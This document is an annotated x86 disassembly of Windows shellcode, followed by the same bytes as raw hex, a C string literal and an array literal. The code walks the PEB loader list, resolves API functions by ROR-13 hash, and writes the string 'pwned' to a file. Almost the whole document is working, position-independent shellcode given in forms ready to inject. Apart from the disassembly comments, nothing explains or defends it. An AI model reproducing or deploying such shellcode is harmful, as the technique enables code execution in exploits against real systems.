
0x0 xor eax, eax                             31 c0                  1.
     ; ***Shellcode Entry Point, offset 0x0***                                            
0x2 xor ecx, ecx                             31 c9                  1.
0x4 mov esi, dword ptr fs:[ecx + 0x30]       64 8b 71 30            d.q0
    ; load TIB                                                                    
0x8 mov esi, dword ptr [esi + 0xc]           8b 76 0c               .v.
    ; load PEB_LDR_DATA LoaderData                                                
0xb mov esi, dword ptr [esi + 0x1c]          8b 76 1c               .v.
    ; LIST_ENTRY InInitializationOrderModuleList                                            
	 label_0xe:
0xe mov edx, dword ptr [esi + 8]             8b 56 08               .V.
0x11 mov edi, dword ptr [esi + 0x20]          8b 7e 20               .~ 
0x14 mov esi, dword ptr [esi]                 8b 36                  .6
    ; advancing DLL flink                                                         
0x16 cmp word ptr [edi + 0x14], cx            66 39 4f 14            f9O.
0x1a jne 0xe                                  75 f2                  u.

0x1c mov cx, 0x6d01                           66 b9 01 6d            f..m
0x20 sub cx, 0x6c94                           66 81 e9 94 6c         f...l
0x25 cmp word ptr [edi], cx                   66 39 0f               f9.
0x28 mov cx, ax                               66 89 c1               f..
0x2b jne 0xe                                  75 e1                  u.

0x2d mov ebp, esp                             89 e5                  ..
0x2f jmp 0xa2                                 eb 71                  .q

	 label_0x31:
0x31 pushal                                   60                     `
0x32 mov ebp, dword ptr [esp + 0x24]          8b 6c 24 24            .l$$
0x36 mov eax, dword ptr [ebp + 0x3c]          8b 45 3c               .E<
0x39 mov edx, dword ptr [ebp + eax + 0x78]    8b 54 05 78            .T.x
0x3d add edx, ebp                             01 ea                  ..
0x3f mov ecx, dword ptr [edx + 0x18]          8b 4a 18               .J.
0x42 mov ebx, dword ptr [edx + 0x20]          8b 5a 20               .Z 
0x45 add ebx, ebp                             01 eb                  ..
	 label_0x47:
0x47 jecxz 0x7d                               e3 34                  .4

0x49 dec ecx                                  49                     I
0x4a mov esi, dword ptr [ebx + ecx*4]         8b 34 8b               .4.
0x4d add esi, ebp                             01 ee                  ..
0x4f xor edi, edi                             31 ff                  1.
0x51 xor eax, eax                             31 c0                  1.
0x53 cld                                      fc                     .
	 label_0x54:
0x54 lodsb al, byte ptr [esi]                 ac                     .
0x55 test al, al                              84 c0                  ..
0x57 je 0x60                                  74 07                  t.

0x59 ror edi, 0xd                             c1 cf 0d               ...
0x5c add edi, eax                             01 c7                  ..
0x5e jmp 0x54                                 eb f4                  ..

	 label_0x60:
0x60 cmp edi, dword ptr [esp + 0x28]          3b 7c 24 28            ;|$(
0x64 jne 0x47                                 75 e1                  u.

0x66 mov ebx, dword ptr [edx + 0x24]          8b 5a 24               .Z$
0x69 add ebx, ebp                             01 eb                  ..
0x6b mov cx, word ptr [ebx + ecx*2]           66 8b 0c 4b            f..K
0x6f mov ebx, dword ptr [edx + 0x1c]          8b 5a 1c               .Z.
0x72 add ebx, ebp                             01 eb                  ..
0x74 mov eax, dword ptr [ebx + ecx*4]         8b 04 8b               ...
0x77 add eax, ebp                             01 e8                  ..
0x79 mov dword ptr [esp + 0x1c], eax          89 44 24 1c            .D$.
	 label_0x7d:
0x7d popal                                    61                     a
0x7e ret                                      c3                     .

	 label_0x7f:
0x7f lodsd eax, dword ptr [esi]               ad                     .
0x80 push eax                                 50                     P
0x81 push edx                                 52                     R
0x82 call 0x31                                e8 aa ff ff ff         .....
0x87 mov dword ptr [edi], eax                 89 07                  ..
0x89 add sp, 0x10c                            66 81 c4 0c 01         f....
0x8e sub sp, 0x104                            66 81 ec 04 01         f....
0x93 add di, 0x108                            66 81 c7 08 01         f....
0x98 sub di, 0x104                            66 81 ef 04 01         f....
0x9d cmp esi, ecx                             39 ce                  9.
0x9f jne 0x7f                                 75 de                  u.

0xa1 ret                                      c3                     .

	 label_0xa2:
0xa2 jmp 0xb4                                 eb 10                  ..

	 label_0xa4:
0xa4 pop esi                                  5e                     ^
0xa5 lea edi, [ebp + 4]                       8d 7d 04               .}.
0xa8 mov ecx, esi                             89 f1                  ..
0xaa add cl, 0xc                              80 c1 0c               ...
0xad call 0x7f                                e8 cd ff ff ff         .....
0xb2 jmp 0xef                                 eb 3b                  .;

	 label_0xb4:
0xb4 call 0xa4                                e8 eb ff ff ff         .....
0xb9 outsb dx, byte ptr [esi]                 6e                     n
0xba db 0x7c                                  7c                     |
0xbb db 0x2e                                  2e                     .
0xbc db 0xe1                                  e1                     .
0xbd db 0x1e                                  1e                     .
0xbe db 0x3c                                  3c                     <
0xbf db 0x3f                                  3f                     ?
0xc0 db 0xd7                                  d7                     .
0xc1 db 0x74                                  74                     t
0xc2 db 0x1e                                  1e                     .
0xc3 db 0x48                                  48                     H
0xc4 db 0xcd                                  cd                     .
	 label_0xc5:
0xc5 xor edx, edx                             31 d2                  1.
0xc7 pop eax                                  58                     X
0xc8 mov byte ptr [eax + 5], dl               88 50 05               .P.
0xcb jmp 0xfa                                 eb 2d                  .-

	 label_0xcd:
0xcd xor edx, edx                             31 d2                  1.
0xcf pop ecx                                  59                     Y
0xd0 mov byte ptr [ecx + 1], dl               88 51 01               .Q.
0xd3 jmp 0x101                                eb 2c                  .,

	 label_0xd5:
0xd5 push ecx                                 51                     Q
0xd6 push eax                                 50                     P
0xd7 call dword ptr [ebp + 4]                 ff 55 04               .U.
0xda jmp 0x106                                eb 2a                  .*

	 label_0xdc:
0xdc xor edx, edx                             31 d2                  1.
0xde pop ecx                                  59                     Y
0xdf mov byte ptr [ecx + 5], dl               88 51 05               .Q.
0xe2 jmp 0x111                                eb 2d                  .-

	 label_0xe4:
0xe4 push ecx                                 51                     Q
0xe5 push eax                                 50                     P
0xe6 mov esi, eax                             89 c6                  ..
0xe8 call dword ptr [ebp + 8]                 ff 55 08               .U.
0xeb push ebx                                 53                     S
0xec call dword ptr [ebp + 0xc]               ff 55 0c               .U.
	 label_0xef:
0xef call 0xc5                                e8 d1 ff ff ff         .....
0xf4 f.txtN ; string		             66 2e 74 78 74 4e      f.txtN
	 label_0xfa:
0xfa call 0xcd                                e8 ce ff ff ff         .....
0xff db 0x77                                  77                     w
0x100 db 0x4e                                  4e                     N
	 label_0x101:
0x101 call 0xd5                                e8 cf ff ff ff         .....
	 label_0x106:
0x106 call 0xdc                                e8 d1 ff ff ff         .....
0x10b pwnedN ; string		             70 77 6e 65 64 4e      pwnedN
	 label_0x111:
0x111 call 0xe4                                e8 ce ff ff ff         .....

Raw Hex:
"31c031c9648b71308b760c8b761c8b56088b7e208b3666394f1475f266b9016d6681e9946c66390f6689c175e189e5eb71608b6c24248b453c8b54057801ea8b4a188b5a2001ebe334498b348b01ee31ff31c0fcac84c07407c1cf0d01c7ebf43b7c242875e18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c3ad5052e8aaffffff89076681c40c016681ec04016681c708016681ef040139ce75dec3eb105e8d7d0489f180c10ce8cdffffffeb3be8ebffffff6e7c2ee11e3c3fd7741e48cd31d258885005eb2d31d259885101eb2c5150ff5504eb2a31d259885105eb2d515089c6ff550853ff550ce8d1ffffff662e7478744ee8ceffffff774ee8cfffffffe8d1ffffff70776e65644ee8ceffffff"

String Literal:
"\x31\xc0\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x56\x08\x8b\x7e\x20\x8b\x36\x66\x39\x4f\x14\x75\xf2\x66\xb9\x01\x6d\x66\x81\xe9\x94\x6c\x66\x39\x0f\x66\x89\xc1\x75\xe1\x89\xe5\xeb\x71\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xad\x50\x52\xe8\xaa\xff\xff\xff\x89\x07\x66\x81\xc4\x0c\x01\x66\x81\xec\x04\x01\x66\x81\xc7\x08\x01\x66\x81\xef\x04\x01\x39\xce\x75\xde\xc3\xeb\x10\x5e\x8d\x7d\x04\x89\xf1\x80\xc1\x0c\xe8\xcd\xff\xff\xff\xeb\x3b\xe8\xeb\xff\xff\xff\x6e\x7c\x2e\xe1\x1e\x3c\x3f\xd7\x74\x1e\x48\xcd\x31\xd2\x58\x88\x50\x05\xeb\x2d\x31\xd2\x59\x88\x51\x01\xeb\x2c\x51\x50\xff\x55\x04\xeb\x2a\x31\xd2\x59\x88\x51\x05\xeb\x2d\x51\x50\x89\xc6\xff\x55\x08\x53\xff\x55\x0c\xe8\xd1\xff\xff\xff\x66\x2e\x74\x78\x74\x4e\xe8\xce\xff\xff\xff\x77\x4e\xe8\xcf\xff\xff\xff\xe8\xd1\xff\xff\xff\x70\x77\x6e\x65\x64\x4e\xe8\xce\xff\xff\xff"

Array Literal:
{0x31, 0xc0, 0x31, 0xc9, 0x64, 0x8b, 0x71, 0x30, 0x8b, 0x76, 0x0c, 0x8b, 0x76, 0x1c, 0x8b, 0x56, 0x08, 0x8b, 0x7e, 0x20, 0x8b, 0x36, 0x66, 0x39, 0x4f, 0x14, 0x75, 0xf2, 0x66, 0xb9, 0x01, 0x6d, 0x66, 0x81, 0xe9, 0x94, 0x6c, 0x66, 0x39, 0x0f, 0x66, 0x89, 0xc1, 0x75, 0xe1, 0x89, 0xe5, 0xeb, 0x71, 0x60, 0x8b, 0x6c, 0x24, 0x24, 0x8b, 0x45, 0x3c, 0x8b, 0x54, 0x05, 0x78, 0x01, 0xea, 0x8b, 0x4a, 0x18, 0x8b, 0x5a, 0x20, 0x01, 0xeb, 0xe3, 0x34, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xee, 0x31, 0xff, 0x31, 0xc0, 0xfc, 0xac, 0x84, 0xc0, 0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xeb, 0xf4, 0x3b, 0x7c, 0x24, 0x28, 0x75, 0xe1, 0x8b, 0x5a, 0x24, 0x01, 0xeb, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x5a, 0x1c, 0x01, 0xeb, 0x8b, 0x04, 0x8b, 0x01, 0xe8, 0x89, 0x44, 0x24, 0x1c, 0x61, 0xc3, 0xad, 0x50, 0x52, 0xe8, 0xaa, 0xff, 0xff, 0xff, 0x89, 0x07, 0x66, 0x81, 0xc4, 0x0c, 0x01, 0x66, 0x81, 0xec, 0x04, 0x01, 0x66, 0x81, 0xc7, 0x08, 0x01, 0x66, 0x81, 0xef, 0x04, 0x01, 0x39, 0xce, 0x75, 0xde, 0xc3, 0xeb, 0x10, 0x5e, 0x8d, 0x7d, 0x04, 0x89, 0xf1, 0x80, 0xc1, 0x0c, 0xe8, 0xcd, 0xff, 0xff, 0xff, 0xeb, 0x3b, 0xe8, 0xeb, 0xff, 0xff, 0xff, 0x6e, 0x7c, 0x2e, 0xe1, 0x1e, 0x3c, 0x3f, 0xd7, 0x74, 0x1e, 0x48, 0xcd, 0x31, 0xd2, 0x58, 0x88, 0x50, 0x05, 0xeb, 0x2d, 0x31, 0xd2, 0x59, 0x88, 0x51, 0x01, 0xeb, 0x2c, 0x51, 0x50, 0xff, 0x55, 0x04, 0xeb, 0x2a, 0x31, 0xd2, 0x59, 0x88, 0x51, 0x05, 0xeb, 0x2d, 0x51, 0x50, 0x89, 0xc6, 0xff, 0x55, 0x08, 0x53, 0xff, 0x55, 0x0c, 0xe8, 0xd1, 0xff, 0xff, 0xff, 0x66, 0x2e, 0x74, 0x78, 0x74, 0x4e, 0xe8, 0xce, 0xff, 0xff, 0xff, 0x77, 0x4e, 0xe8, 0xcf, 0xff, 0xff, 0xff, 0xe8, 0xd1, 0xff, 0xff, 0xff, 0x70, 0x77, 0x6e, 0x65, 0x64, 0x4e, 0xe8, 0xce, 0xff, 0xff, 0xff}
